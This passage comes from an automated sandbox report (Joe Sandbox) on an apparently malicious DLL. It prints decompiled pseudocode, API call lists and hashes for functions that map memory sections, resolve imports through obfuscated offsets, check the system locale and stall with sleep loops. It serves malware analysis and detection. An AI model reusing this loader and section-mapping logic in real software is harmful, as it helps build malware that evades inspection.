				_push(_t15 + 0x6d4a5054);
				_push(0x16);
				_push( &_v60);
				_v12 = _t31;
				L6D4A220A();
				_t18 = _a4;
				if(_t18 == 0) {
					_t18 = 0x1000;
				}
				_t19 = CreateFileMappingW(0xffffffff, 0x6d4a41c0, 4, 0, _t18,  &_v60); // executed
				_t34 = _t19;
				if(_t34 == 0) {
					_t32 = GetLastError();
				} else {
					if(_a4 != 0 || GetLastError() == 0xb7) {
						_t22 = MapViewOfFile(_t34, 6, 0, 0, 0); // executed
						if(_t22 == 0) {
							_t32 = GetLastError();
							if(_t32 != 0) {
								goto L9;
							}
						} else {
							 *_a8 = _t34;
							 *_a12 = _t22;
							_t32 = 0;
						}
					} else {
						_t32 = 2;
						L9:
						CloseHandle(_t34);
					}
				}
				return _t32;
			}

0x6d4a1979
0x6d4a1982
0x6d4a1986
0x6d4a198c
0x6d4a1991
0x6d4a1996
0x6d4a1999
0x6d4a199c
0x6d4a19a1
0x6d4a19a2
0x6d4a19a5
0x6d4a19b0
0x6d4a19b7
0x6d4a19bb
0x6d4a19bd
0x6d4a19be
0x6d4a19c1
0x6d4a19c6
0x6d4a19d0
0x6d4a19d2
0x6d4a19d2
0x6d4a19e6
0x6d4a19ec
0x6d4a19f0
0x6d4a1a40
0x6d4a19f2
0x6d4a19fb
0x6d4a1a11
0x6d4a1a19
0x6d4a1a2b
0x6d4a1a2f
0x00000000
0x00000000
0x6d4a1a1b
0x6d4a1a1e
0x6d4a1a23
0x6d4a1a25
0x6d4a1a25
0x6d4a1a06
0x6d4a1a08
0x6d4a1a31
0x6d4a1a32
0x6d4a1a32
0x6d4a19fb
0x6d4a1a48

APIs

GetSystemTimeAsFileTime.KERNEL32(?,00000002,00000000,?,?,?,?,?,?,?,?,?,6D4A176E,0000000A,?,?), ref: 6D4A1986
_aulldiv.NTDLL(?,?,54D38000,00000192), ref: 6D4A199C
_snwprintf.NTDLL ref: 6D4A19C1
CreateFileMappingW.KERNELBASE(000000FF,6D4A41C0,00000004,00000000,?,?), ref: 6D4A19E6
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,6D4A176E,0000000A,?), ref: 6D4A19FD
MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000), ref: 6D4A1A11
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,6D4A176E,0000000A,?), ref: 6D4A1A29
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,6D4A176E,0000000A), ref: 6D4A1A32
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,6D4A176E,0000000A,?), ref: 6D4A1A3A

Memory Dump Source

Source File: 00000000.00000002.1096718873.000000006D4A1000.00000020.00020000.sdmp, Offset: 6D4A0000, based on PE: true

Associated: 00000000.00000002.1096708397.000000006D4A0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1096729995.000000006D4A3000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1096740697.000000006D4A5000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1096751045.000000006D4A6000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d4a0000_loaddll32.jbxd

Similarity

API ID: ErrorFileLast$Time$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
String ID:
API String ID: 1724014008-0
Opcode ID: 6971fc034a5cee4b252ae4944d93ddd36d14885b440a8737158c141a869e0fed
Instruction ID: 60078ca8498c899529a46ca4ed9424bbe4eca98ca5021fe797a974a9844888f8
Opcode Fuzzy Hash: 6971fc034a5cee4b252ae4944d93ddd36d14885b440a8737158c141a869e0fed
Instruction Fuzzy Hash: 2921CFB6644118BFDB11AFE8CC88FAE7BBCEB59354F198025F615E7248E7709C418B60

Uniqueness

Uniqueness Score: -1.00%

Function 6D4A18D1, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 72%

			E6D4A18D1(intOrPtr* __eax, void** _a4) {
				int _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				int _v28;
				int _v32;
				intOrPtr _v36;
				int _v40;
				int _v44;
				void* _v48;
				void* __esi;
				long _t34;
				void* _t39;
				void* _t47;
				intOrPtr* _t48;

				_t48 = __eax;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v24 =  *((intOrPtr*)(__eax + 4));
				_v16 = 0;
				_v12 = 0;
				_v48 = 0x18;
				_v44 = 0;
				_v36 = 0x40;
				_v40 = 0;
				_v32 = 0;
				_v28 = 0;
				_t34 = NtCreateSection( &_v16, 0xf001f,  &_v48,  &_v24,  *(__eax + 8), 0x8000000, 0);
				if(_t34 < 0) {
					_t47 =  *((intOrPtr*)(_t48 + 0x18))(_t34);
				} else {
					 *_t48 = _v16;
					_t39 = E6D4A1B89(_t48,  &_v12); // executed
					_t47 = _t39;
					if(_t47 != 0) {
						 *((intOrPtr*)(_t48 + 0x1c))(_v16);
					} else {
						memset(_v12, 0, _v24);
						 *_a4 = _v12;
					}
				}
				return _t47;
			}

0x6d4a18da
0x6d4a18e1
0x6d4a18e2
0x6d4a18e3
0x6d4a18e4
0x6d4a18e5
0x6d4a18f6
0x6d4a18fa
0x6d4a190e
0x6d4a1911
0x6d4a1914
0x6d4a191b
0x6d4a191e
0x6d4a1925
0x6d4a1928
0x6d4a192b
0x6d4a192e
0x6d4a1933
0x6d4a196e
0x6d4a1935
0x6d4a1938
0x6d4a193e
0x6d4a1943
0x6d4a1947
0x6d4a1965
0x6d4a1949
0x6d4a1950
0x6d4a195e
0x6d4a195e
0x6d4a1947
0x6d4a1976

APIs

NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,73B74EE0,00000000,00000000), ref: 6D4A192E

Part of subcall function 6D4A1B89: NtMapViewOfSection.NTDLL(00000000,000000FF,6D4A1943,00000000,00000000,?,?,00000002,00000000,?,?,00000000,?,6D4A1943,?), ref: 6D4A1BB6

memset.NTDLL ref: 6D4A1950

Strings

@, xrefs: 6D4A191E

Memory Dump Source

Source File: 00000000.00000002.1096718873.000000006D4A1000.00000020.00020000.sdmp, Offset: 6D4A0000, based on PE: true

Associated: 00000000.00000002.1096708397.000000006D4A0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1096729995.000000006D4A3000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1096740697.000000006D4A5000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1096751045.000000006D4A6000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d4a0000_loaddll32.jbxd

Similarity

API ID: Section$CreateViewmemset
String ID: @
API String ID: 2533685722-2766056989
Opcode ID: 00af36b428359ca772932176b9c6d2f97bd417452e06b8a4b42cf2ee787d1e4b
Instruction ID: 806025fab5d33c3b5af41e9f6e265e0e17beeb95a8f8cdc91278e5cd8b984618
Opcode Fuzzy Hash: 00af36b428359ca772932176b9c6d2f97bd417452e06b8a4b42cf2ee787d1e4b
Instruction Fuzzy Hash: 1421F7B6D00209AFDB01CFA9C8849DEFBB9EF48354F14842AE615F3210D730AE45CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 6D4A1566, Relevance: 4.5, APIs: 3, Instructions: 23
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E6D4A1566(void* __ecx) {
				char _v8;
				signed short _t7;

				_v8 = _v8 & 0x00000000;
				_t7 = GetLocaleInfoA(0x400, 0x5a,  &_v8, 4); // executed
				if(_t7 == 0) {
					__imp__GetSystemDefaultUILanguage();
					VerLanguageNameA(_t7 & 0xffff,  &_v8, 4);
				}
				return _v8;
			}

0x6d4a156a
0x6d4a157b
0x6d4a1583
0x6d4a1585
0x6d4a1598
0x6d4a1598
0x6d4a15a2

APIs

GetLocaleInfoA.KERNELBASE(00000400,0000005A,00000000,00000004,?,?,6D4A1C5E,?,6D4A1810,?,00000000,00000000,?,?,?,6D4A1810), ref: 6D4A157B
GetSystemDefaultUILanguage.KERNEL32(?,?,6D4A1C5E,?,6D4A1810,?,00000000,00000000,?,?,?,6D4A1810), ref: 6D4A1585
VerLanguageNameA.KERNEL32(?,00000000,00000004,?,?,6D4A1C5E,?,6D4A1810,?,00000000,00000000,?,?,?,6D4A1810), ref: 6D4A1598

Memory Dump Source

Source File: 00000000.00000002.1096718873.000000006D4A1000.00000020.00020000.sdmp, Offset: 6D4A0000, based on PE: true

Associated: 00000000.00000002.1096708397.000000006D4A0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1096729995.000000006D4A3000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1096740697.000000006D4A5000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1096751045.000000006D4A6000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d4a0000_loaddll32.jbxd

Similarity

API ID: Language$DefaultInfoLocaleNameSystem
String ID:
API String ID: 3724080410-0
Opcode ID: 615dfe7f38474e9fcae916d112640f68d7f656b55d14cfd8978ae9e4f06cf468
Instruction ID: bc4be26740e46a57d48641e98253d451e581b36087047a61ec46d26e2c539534
Opcode Fuzzy Hash: 615dfe7f38474e9fcae916d112640f68d7f656b55d14cfd8978ae9e4f06cf468
Instruction Fuzzy Hash: 51E04868644205B6E700E7D19C0AFBD767C9B1070AF500044F701D60C4E774DE049765

Uniqueness

Uniqueness Score: -1.00%

Function 6D4A1F31, Relevance: 3.1, APIs: 2, Instructions: 92
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6D4A1F31(void* __edi, intOrPtr _a4) {
				signed int _v8;
				intOrPtr* _v12;
				_Unknown_base(*)()** _v16;
				signed int _v20;
				signed short _v24;
				struct HINSTANCE__* _v28;
				intOrPtr _t43;
				intOrPtr* _t45;
				intOrPtr _t46;
				struct HINSTANCE__* _t47;
				intOrPtr* _t49;
				intOrPtr _t50;
				signed short _t51;
				_Unknown_base(*)()* _t53;
				CHAR* _t54;
				_Unknown_base(*)()* _t55;
				void* _t58;
				signed int _t59;
				_Unknown_base(*)()* _t60;
				intOrPtr _t61;
				intOrPtr _t65;
				signed int _t68;
				void* _t69;
				CHAR* _t71;
				signed short* _t73;

				_t69 = __edi;
				_v20 = _v20 & 0x00000000;
				_t59 =  *0x6d4a41cc;
				_t43 =  *((intOrPtr*)(_a4 + _t59 * 8 - 0x1b4cdd98));
				if(_t43 != 0) {
					_t45 = _t43 + __edi;
					_v12 = _t45;
					_t46 =  *((intOrPtr*)(_t45 + 0xc));
					if(_t46 != 0) {
						while(1) {
							_t71 = _t46 + _t69;
							_t47 = LoadLibraryA(_t71); // executed
							_v28 = _t47;
							if(_t47 == 0) {
								break;
							}
							_v24 = _v24 & 0x00000000;
							 *_t71 = _t59 - 0x63699bc3;
							_t49 = _v12;
							_t61 =  *((intOrPtr*)(_t49 + 0x10));
							_t50 =  *_t49;
							if(_t50 != 0) {
								L6:
								_t73 = _t50 + _t69;
								_v16 = _t61 + _t69;
								while(1) {
									_t51 =  *_t73;
									if(_t51 == 0) {
										break;
									}
									if(__eflags < 0) {
										__eflags = _t51 - _t69;
										if(_t51 < _t69) {
											L12:
											_t21 =  &_v8;
											 *_t21 = _v8 & 0x00000000;
											__eflags =  *_t21;
											_v24 =  *_t73 & 0x0000ffff;
										} else {
											_t65 = _a4;
											__eflags = _t51 -  *((intOrPtr*)(_t65 + 0x50)) + _t69;
											if(_t51 >=  *((intOrPtr*)(_t65 + 0x50)) + _t69) {
												goto L12;
											} else {
												goto L11;
											}
										}
									} else {
										_t51 = _t51 + _t69;
										L11:
										_v8 = _t51;
									}
									_t53 = _v8;
									__eflags = _t53;
									if(_t53 == 0) {
										_t54 = _v24 & 0x0000ffff;
									} else {
										_t54 = _t53 + 2;
									}
									_t55 = GetProcAddress(_v28, _t54);
									__eflags = _t55;
									if(__eflags == 0) {
										_v20 = _t59 - 0x63699b44;
									} else {
										_t68 = _v8;
										__eflags = _t68;
										if(_t68 != 0) {
											 *_t68 = _t59 - 0x63699bc3;
										}
										 *_v16 = _t55;
										_t58 = 0x725990f8 + _t59 * 4;
										_t73 = _t73 + _t58;
										_t32 =  &_v16;
										 *_t32 = _v16 + _t58;
										__eflags =  *_t32;
										continue;
									}
									goto L23;
								}
							} else {
								_t50 = _t61;
								if(_t61 != 0) {
									goto L6;
								}
							}
							L23:
							_v12 = _v12 + 0x14;
							_t46 =  *((intOrPtr*)(_v12 + 0xc));
							if(_t46 != 0) {
								continue;
							} else {
							}
							L26:
							goto L27;
						}
						_t60 = _t59 + 0x9c9664bb;
						__eflags = _t60;
						_v20 = _t60;
						goto L26;
					}
				}
				L27:
				return _v20;
			}

0x6d4a1f31
0x6d4a1f3a
0x6d4a1f3f
0x6d4a1f45
0x6d4a1f4e
0x6d4a1f54
0x6d4a1f56
0x6d4a1f59
0x6d4a1f5e
0x6d4a1f65
0x6d4a1f65
0x6d4a1f69
0x6d4a1f71
0x6d4a1f74
0x00000000
0x00000000
0x6d4a1f7a
0x6d4a1f84
0x6d4a1f86
0x6d4a1f89
0x6d4a1f8c
0x6d4a1f90
0x6d4a1f98
0x6d4a1f9a
0x6d4a1f9d
0x6d4a2005
0x6d4a2005
0x6d4a2009
0x00000000
0x00000000
0x6d4a1fa2
0x6d4a1fa8
0x6d4a1faa
0x6d4a1fbd
0x6d4a1fc0
0x6d4a1fc0
0x6d4a1fc0
0x6d4a1fc4
0x6d4a1fac
0x6d4a1fac
0x6d4a1fb4
0x6d4a1fb6
0x00000000
0x00000000
0x00000000
0x00000000
0x6d4a1fb6
0x6d4a1fa4
0x6d4a1fa4
0x6d4a1fb8
0x6d4a1fb8
0x6d4a1fb8
0x6d4a1fc7
0x6d4a1fca
0x6d4a1fcc
0x6d4a1fd3
0x6d4a1fce
0x6d4a1fce
0x6d4a1fce
0x6d4a1fdb
0x6d4a1fe1
0x6d4a1fe3
0x6d4a2013
0x6d4a1fe5
0x6d4a1fe5
0x6d4a1fe8
0x6d4a1fea
0x6d4a1ff2
0x6d4a1ff2
0x6d4a1ff7
0x6d4a1ff9
0x6d4a2000
0x6d4a2002
0x6d4a2002
0x6d4a2002
0x00000000
0x6d4a2002
0x00000000
0x6d4a1fe3
0x6d4a1f92
0x6d4a1f94
0x6d4a1f96
0x00000000
0x00000000
0x6d4a1f96
0x6d4a2016
0x6d4a2016
0x6d4a201d
0x6d4a2022
0x00000000
0x00000000
0x6d4a2028
0x6d4a2033
0x00000000
0x6d4a2033
0x6d4a202a
0x6d4a202a
0x6d4a2030
0x00000000
0x6d4a2030
0x6d4a1f5e
0x6d4a2034
0x6d4a2039

APIs

LoadLibraryA.KERNELBASE(?,?,00000000,?,?), ref: 6D4A1F69
GetProcAddress.KERNEL32(?,00000000), ref: 6D4A1FDB

Memory Dump Source

Source File: 00000000.00000002.1096718873.000000006D4A1000.00000020.00020000.sdmp, Offset: 6D4A0000, based on PE: true

Associated: 00000000.00000002.1096708397.000000006D4A0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1096729995.000000006D4A3000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1096740697.000000006D4A5000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1096751045.000000006D4A6000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d4a0000_loaddll32.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID:
API String ID: 2574300362-0
Opcode ID: c411176814761aa216c933c6ee5dd2f882ca72e60b73035175ad629e01b3d332
Instruction ID: 222a173ee150c1bfa9384156c09d12b921c3baad7613cd86d0e9158614e85f07
Opcode Fuzzy Hash: c411176814761aa216c933c6ee5dd2f882ca72e60b73035175ad629e01b3d332
Instruction Fuzzy Hash: CF311771A042169FDB14CF5AC880FAEB7F4BF65344B28806AE911EB348EB70DE41DB50

Uniqueness

Uniqueness Score: -1.00%

Function 6D4A1B89, Relevance: 1.5, APIs: 1, Instructions: 34
nativeCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E6D4A1B89(void** __esi, PVOID* _a4) {
				long _v8;
				void* _v12;
				void* _v16;
				long _t13;

				_v16 = 0;
				asm("stosd");
				_v8 = 0;
				_t13 = NtMapViewOfSection( *__esi, 0xffffffff, _a4, 0, 0,  &_v16,  &_v8, 2, 0, __esi[2]);
				if(_t13 < 0) {
					_push(_t13);
					return __esi[6]();
				}
				return 0;
			}

0x6d4a1b9b
0x6d4a1ba1
0x6d4a1baf
0x6d4a1bb6
0x6d4a1bbb
0x6d4a1bc1
0x00000000
0x6d4a1bc2
0x00000000

APIs

NtMapViewOfSection.NTDLL(00000000,000000FF,6D4A1943,00000000,00000000,?,?,00000002,00000000,?,?,00000000,?,6D4A1943,?), ref: 6D4A1BB6

Memory Dump Source

Source File: 00000000.00000002.1096718873.000000006D4A1000.00000020.00020000.sdmp, Offset: 6D4A0000, based on PE: true

Associated: 00000000.00000002.1096708397.000000006D4A0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1096729995.000000006D4A3000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1096740697.000000006D4A5000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1096751045.000000006D4A6000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d4a0000_loaddll32.jbxd

Similarity

API ID: SectionView
String ID:
API String ID: 1323581903-0
Opcode ID: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
Instruction ID: 5698c5a017fc3ea25adf17a5fda987dee9d8157fe150ccb4ce8410492eb24f06
Opcode Fuzzy Hash: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
Instruction Fuzzy Hash: 59F012B590020CFFEB119FA5CC85C9FBBFDEB48354B10493AB552E1094E6309E089B60

Uniqueness

Uniqueness Score: -1.00%

Function 6D4A17A7, Relevance: 15.1, APIs: 10, Instructions: 103
threadsleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 80%

			E6D4A17A7(intOrPtr _a4) {
				char _v28;
				struct _SYSTEMTIME _v44;
				char _v48;
				long _v52;
				long _v56;
				void* __edi;
				long _t21;
				int _t23;
				long _t26;
				long _t27;
				long _t31;
				void* _t37;
				intOrPtr _t39;
				intOrPtr _t44;
				signed int _t45;
				void* _t50;
				signed int _t54;
				void* _t56;
				intOrPtr* _t57;

				_t21 = E6D4A146C();
				_v52 = _t21;
				if(_t21 != 0) {
					L18:
					return _t21;
				} else {
					goto L1;
				}
				do {
					L1:
					GetSystemTime( &_v44);
					_t23 = SwitchToThread();
					asm("cdq");
					_t45 = 9;
					_t54 = _t23 + (_v44.wMilliseconds & 0x0000ffff) % _t45;
					_t26 = E6D4A15A3(0, _t54); // executed
					_v56 = _t26;
					Sleep(_t54 << 5); // executed
					_t21 = _v56;
				} while (_t21 == 0xc);
				if(_t21 != 0) {
					goto L18;
				}
				_t27 = E6D4A1C12(_t45); // executed
				_v52 = _t27;
				if(_t27 != 0) {
					L16:
					_t21 = _v52;
					if(_t21 == 0xffffffff) {
						_t21 = GetLastError();
					}
					goto L18;
				}
				if(_a4 != 0) {
					L11:
					_push(0);
					_t56 = E6D4A1CA4(E6D4A16EC,  &_v28);
					if(_t56 == 0) {
						_v56 = GetLastError();
					} else {
						_t31 = WaitForSingleObject(_t56, 0xffffffff);
						_v56 = _t31;
						if(_t31 == 0) {
							GetExitCodeThread(_t56,  &_v56);
						}
						CloseHandle(_t56);
					}
					goto L16;
				}
				if(E6D4A1D7C(_t45,  &_v48) != 0) {
					 *0x6d4a41b8 = 0;
					goto L11;
				}
				_t44 = _v48;
				_t57 = __imp__GetLongPathNameW;
				_t37 =  *_t57(_t44, 0, 0); // executed
				_t50 = _t37;
				if(_t50 == 0) {
					L9:
					 *0x6d4a41b8 = _t44;
					goto L11;
				}
				_t15 = _t50 + 2; // 0x2
				_t39 = E6D4A1C8F(_t50 + _t15);
				 *0x6d4a41b8 = _t39;
				if(_t39 == 0) {
					goto L9;
				} else {
					 *_t57(_t44, _t39, _t50); // executed
					E6D4A136A(_t44);
					goto L11;
				}
			}

0x6d4a17b3
0x6d4a17bc
0x6d4a17c0
0x6d4a18c8
0x6d4a18ce
0x00000000
0x00000000
0x00000000
0x6d4a17c6
0x6d4a17c6
0x6d4a17cb
0x6d4a17d1
0x6d4a17e0
0x6d4a17e1
0x6d4a17e4
0x6d4a17e7
0x6d4a17f0
0x6d4a17f4
0x6d4a17fa
0x6d4a17fe
0x6d4a1805
0x00000000
0x00000000
0x6d4a180b
0x6d4a1812
0x6d4a1816
0x6d4a18b9
0x6d4a18b9
0x6d4a18c0
0x6d4a18c2
0x6d4a18c2
0x00000000
0x6d4a18c0
0x6d4a181f
0x6d4a1872
0x6d4a1872
0x6d4a1883
0x6d4a1887
0x6d4a18b5
0x6d4a1889
0x6d4a188c
0x6d4a1894
0x6d4a1898
0x6d4a18a0
0x6d4a18a0
0x6d4a18a7
0x6d4a18a7
0x00000000
0x6d4a1887
0x6d4a182d
0x6d4a186c
0x00000000
0x6d4a186c
0x6d4a182f
0x6d4a1833
0x6d4a183c
0x6d4a183e
0x6d4a1842
0x6d4a1864
0x6d4a1864
0x00000000
0x6d4a1864
0x6d4a1844
0x6d4a1849
0x6d4a1850
0x6d4a1855
0x00000000
0x6d4a1857
0x6d4a185a
0x6d4a185d
0x00000000
0x6d4a185d

APIs

Part of subcall function 6D4A146C: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,6D4A17B8,73B763F0,00000000), ref: 6D4A147B
Part of subcall function 6D4A146C: GetVersion.KERNEL32 ref: 6D4A148A
Part of subcall function 6D4A146C: GetCurrentProcessId.KERNEL32 ref: 6D4A1499
Part of subcall function 6D4A146C: OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 6D4A14B2

GetSystemTime.KERNEL32(?,73B763F0,00000000), ref: 6D4A17CB
SwitchToThread.KERNEL32 ref: 6D4A17D1

Part of subcall function 6D4A15A3: VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004,?,?,00000000,00000000), ref: 6D4A15F9
Part of subcall function 6D4A15A3: memcpy.NTDLL(?,?,00000000,?,?,00000000,00000000,?,?,?,?,?,?,?,?,6D4A17EC), ref: 6D4A168B
Part of subcall function 6D4A15A3: VirtualFree.KERNELBASE(?,00000000,00008000,?,?,00000000,00000000), ref: 6D4A16A6

Sleep.KERNELBASE(00000000,00000000), ref: 6D4A17F4
GetLongPathNameW.KERNELBASE ref: 6D4A183C
GetLongPathNameW.KERNELBASE ref: 6D4A185A
WaitForSingleObject.KERNEL32(00000000,000000FF,6D4A16EC,?,00000000), ref: 6D4A188C
GetExitCodeThread.KERNEL32(00000000,?), ref: 6D4A18A0
CloseHandle.KERNEL32(00000000), ref: 6D4A18A7
GetLastError.KERNEL32(6D4A16EC,?,00000000), ref: 6D4A18AF
GetLastError.KERNEL32 ref: 6D4A18C2

Memory Dump Source

Source File: 00000000.00000002.1096718873.000000006D4A1000.00000020.00020000.sdmp, Offset: 6D4A0000, based on PE: true

Associated: 00000000.00000002.1096708397.000000006D4A0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1096729995.000000006D4A3000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1096740697.000000006D4A5000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1096751045.000000006D4A6000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d4a0000_loaddll32.jbxd

Similarity

API ID: ErrorLastLongNamePathProcessThreadVirtual$AllocCloseCodeCreateCurrentEventExitFreeHandleObjectOpenSingleSleepSwitchSystemTimeVersionWaitmemcpy
String ID:
API String ID: 2280543912-0
Opcode ID: 14ebfdfbd39586b81159e968ffa1a24a20c136354cc3d4446180345891ac2aa0
Instruction ID: 5c266ac68939ad64bf2b0743dfa6c4bf9c6568e45a9978c232df27e7bb6c41f4
Opcode Fuzzy Hash: 14ebfdfbd39586b81159e968ffa1a24a20c136354cc3d4446180345891ac2aa0
Instruction Fuzzy Hash: 183183718087129BD710EF658848E6F7BFCEBA6754B1D0A1EF5A4C624CE730CD058BA2

Uniqueness

Uniqueness Score: -1.00%

Function 6D4A1AA5, Relevance: 9.1, APIs: 6, Instructions: 81
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E6D4A1AA5(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				intOrPtr _v8;
				_Unknown_base(*)()* _t29;
				_Unknown_base(*)()* _t33;
				_Unknown_base(*)()* _t36;
				_Unknown_base(*)()* _t39;
				_Unknown_base(*)()* _t42;
				intOrPtr _t46;
				struct HINSTANCE__* _t50;
				intOrPtr _t56;

				_t56 = E6D4A1C8F(0x20);
				if(_t56 == 0) {
					_v8 = 8;
				} else {
					_t50 = GetModuleHandleA( *0x6d4a41d0 + 0x6d4a5014);
					_v8 = 0x7f;
					_t29 = GetProcAddress(_t50,  *0x6d4a41d0 + 0x6d4a50e1);
					 *(_t56 + 0xc) = _t29;
					if(_t29 == 0) {
						L8:
						E6D4A136A(_t56);
					} else {
						_t33 = GetProcAddress(_t50,  *0x6d4a41d0 + 0x6d4a50f1);
						 *(_t56 + 0x10) = _t33;
						if(_t33 == 0) {
							goto L8;
						} else {
							_t36 = GetProcAddress(_t50,  *0x6d4a41d0 + 0x6d4a5104);
							 *(_t56 + 0x14) = _t36;
							if(_t36 == 0) {
								goto L8;
							} else {
								_t39 = GetProcAddress(_t50,  *0x6d4a41d0 + 0x6d4a5119);
								 *(_t56 + 0x18) = _t39;
								if(_t39 == 0) {
									goto L8;
								} else {
									_t42 = GetProcAddress(_t50,  *0x6d4a41d0 + 0x6d4a512f);
									 *(_t56 + 0x1c) = _t42;
									if(_t42 == 0) {
										goto L8;
									} else {
										 *((intOrPtr*)(_t56 + 8)) = _a8;
										 *((intOrPtr*)(_t56 + 4)) = _a4;
										_t46 = E6D4A18D1(_t56, _a12); // executed
										_v8 = _t46;
										if(_t46 != 0) {
											goto L8;
										} else {
											 *_a16 = _t56;
										}
									}
								}
							}
						}
					}
				}
				return _v8;
			}

0x6d4a1ab3
0x6d4a1ab7
0x6d4a1b78
0x6d4a1abd
0x6d4a1ad5
0x6d4a1ae4
0x6d4a1aeb
0x6d4a1aef
0x6d4a1af2
0x6d4a1b70
0x6d4a1b71
0x6d4a1af4
0x6d4a1b01
0x6d4a1b05
0x6d4a1b08
0x00000000
0x6d4a1b0a
0x6d4a1b17
0x6d4a1b1b
0x6d4a1b1e
0x00000000
0x6d4a1b20
0x6d4a1b2d
0x6d4a1b31
0x6d4a1b34
0x00000000
0x6d4a1b36
0x6d4a1b43
0x6d4a1b47
0x6d4a1b4a
0x00000000
0x6d4a1b4c
0x6d4a1b52
0x6d4a1b58
0x6d4a1b5d
0x6d4a1b64
0x6d4a1b67
0x00000000
0x6d4a1b69
0x6d4a1b6c
0x6d4a1b6c
0x6d4a1b67
0x6d4a1b4a
0x6d4a1b34
0x6d4a1b1e
0x6d4a1b08
0x6d4a1af2
0x6d4a1b86

APIs

Part of subcall function 6D4A1C8F: HeapAlloc.KERNEL32(00000000,?,6D4A117D,?,00000000,00000000,?,?,?,6D4A1810), ref: 6D4A1C9B

GetModuleHandleA.KERNEL32(?,00000020,?,?,?,?,?,6D4A1272,?,?,?,?), ref: 6D4A1AC9
GetProcAddress.KERNEL32(00000000,?), ref: 6D4A1AEB
GetProcAddress.KERNEL32(00000000,?), ref: 6D4A1B01
GetProcAddress.KERNEL32(00000000,?), ref: 6D4A1B17
GetProcAddress.KERNEL32(00000000,?), ref: 6D4A1B2D
GetProcAddress.KERNEL32(00000000,?), ref: 6D4A1B43

Part of subcall function 6D4A18D1: NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,73B74EE0,00000000,00000000), ref: 6D4A192E
Part of subcall function 6D4A18D1: memset.NTDLL ref: 6D4A1950

Memory Dump Source

Source File: 00000000.00000002.1096718873.000000006D4A1000.00000020.00020000.sdmp, Offset: 6D4A0000, based on PE: true

Associated: 00000000.00000002.1096708397.000000006D4A0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1096729995.000000006D4A3000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1096740697.000000006D4A5000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1096751045.000000006D4A6000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d4a0000_loaddll32.jbxd

Similarity

API ID: AddressProc$AllocCreateHandleHeapModuleSectionmemset
String ID:
API String ID: 1632424568-0
Opcode ID: 700a0485ffad4df51c713c95797c0474b2dd4b3359cd684d8c073b5114b3e2d2
Instruction ID: 7a5b9d0c1460af8916d8bb3038f1f18f71b13b57c3cf11293718805da2121610
Opcode Fuzzy Hash: 700a0485ffad4df51c713c95797c0474b2dd4b3359cd684d8c073b5114b3e2d2
Instruction Fuzzy Hash: 8D2121F550120A9FDB10EF69C994E6E7BF8FB19384B194426E919C7219E730ED11CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 6D4A1E04, Relevance: 9.1, APIs: 6, Instructions: 71
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 86%

			_entry_(void* __ecx, intOrPtr _a4, char _a8, intOrPtr _a12) {
				long _v8;
				void* __edi;
				void* __esi;
				void* __ebp;
				char _t9;
				void* _t10;
